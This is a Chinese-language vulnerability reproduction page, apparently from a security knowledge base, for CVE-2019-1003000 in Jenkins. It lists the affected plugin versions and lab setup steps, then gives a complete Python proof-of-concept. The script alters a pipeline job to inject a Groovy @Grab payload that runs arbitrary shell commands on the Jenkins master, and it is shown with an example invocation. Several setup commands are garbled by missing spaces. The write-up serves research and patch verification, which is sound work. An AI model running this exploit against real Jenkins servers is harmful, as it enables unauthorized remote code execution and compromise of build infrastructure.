menu arrow_back 湛蓝安全空间 |狂野湛蓝,暴躁每天 chevron_right ... chevron_right (CVE-2019-1003000)Jenkins 远程代码执行漏洞 chevron_right (CVE-2019-1003000)Jenkins 远程代码执行漏洞.md
  • home 首页
  • brightness_4 暗黑模式
    • cloud
    xLIYhHS7e34ez7Ma
    cloud
    湛蓝安全
    code
    Github
    (CVE-2019-1003000)Jenkins 远程代码执行漏洞.md
    3.83 KB / 2021-07-15 19:54:30
        (CVE-2019-1003000)Jenkins 远程代码执行漏洞
============================================

一、漏洞简介
------------

该漏洞存在于Declarative Plugin 1.3.4.1之前的版本, Groovy Plugin
2.61.1之前的版本以及 Script Security Plugin
1.50之前的版本。该漏洞通过将AST转换注释(如\@Grab)应用于源代码元素,可以在脚本编译阶段避免脚本安全沙箱保护。所以会造成具有"Overall/Read"权限的用户或能够控制SCM中的Jenkinsfile或者sandboxed
Pipeline共享库内容的用户可以绕过沙盒保护并在Jenkins主服务器上执行任意代码。

二、漏洞影响
------------

Declarative Plugin \< 1.3.4.1

Groovy Plugin \< 2.61.1

Script Security Plugin \< 1.50

三、复现过程
------------

### 环境搭建

    gitclone https://github.com/ianxtianxt/cve-2019-1003000-jenkins-rce-poc.git

    cdcve-2019-1003000-jenkins-rce-poc

    pipinstall -r requirements.txt

    cdsample-vuln

    ./run.sh

**输入账号密码user1:user1**

![](./resource/(CVE-2019-1003000)Jenkins远程代码执行漏洞/media/rId25.png)

***\*poc进行攻击pythonexploit.py --url http://www.0-sec.org:8080 --job
my-pipeline --usernameuser1 --password user1 --cmd "whoami"\****

![](./resource/(CVE-2019-1003000)Jenkins远程代码执行漏洞/media/rId26.png)

![](./resource/(CVE-2019-1003000)Jenkins远程代码执行漏洞/media/rId27.png)

### poc

    #!/usr/bin/python

    # Author: Adam Jordan
    # Date: 2019-02-15
    # Repository: https://github.com/adamyordan/cve-2019-1003000-jenkins-rce-poc
    # PoC for: SECURITY-1266 / CVE-2019-1003000 (Script Security), CVE-2019-1003001 (Pipeline: Groovy), CVE-2019-1003002 (Pipeline: Declarative)


    import argparse
    import jenkins
    import time
    from xml.etree import ElementTree

    payload = '''
    import org.buildobjects.process.ProcBuilder
    @Grab('org.buildobjects:jproc:2.2.3')
    class Dummy{ }
    print new ProcBuilder("/bin/bash").withArgs("-c","%s").run().getOutputString()
    '''


    def run_command(url, cmd, job_name, username, password):
        print '[+] connecting to jenkins...'
        server = jenkins.Jenkins(url, username, password)

        print '[+] crafting payload...'
        ori_job_config = server.get_job_config(job_name)
        et = ElementTree.fromstring(ori_job_config)
        et.find('definition/script').text = payload % cmd
        job_config = ElementTree.tostring(et, encoding='utf8', method='xml')

        print '[+] modifying job with payload...'
        server.reconfig_job(job_name, job_config)
        time.sleep(3)

        print '[+] putting job build to queue...'
        queue_number = server.build_job(job_name)
        time.sleep(3)

        print '[+] waiting for job to build...'
        queue_item_info = {}
        while 'executable' not in queue_item_info:
            queue_item_info = server.get_queue_item(queue_number)
            time.sleep(1)

        print '[+] restoring job...'
        server.reconfig_job(job_name, ori_job_config)
        time.sleep(3)

        print '[+] fetching output...'
        last_build_number = server.get_job_info(job_name)['lastBuild']['number']
        console_output = server.get_build_console_output(job_name, last_build_number)

        print '[+] OUTPUT:'
        print console_output


    if __name__ == '__main__':
        parser = argparse.ArgumentParser(description='Jenkins RCE')

        parser.add_argument('--url', help='target jenkins url')
        parser.add_argument('--cmd', help='system command to be run')
        parser.add_argument('--job', help='job name')
        parser.add_argument('--username', help='username')
        parser.add_argument('--password', help='password')

        args = parser.parse_args()

        run_command(args.url, args.cmd, args.job, args.username, args.password)

参考链接
--------

> https://www.freebuf.com/column/197026.html
    links
    file_download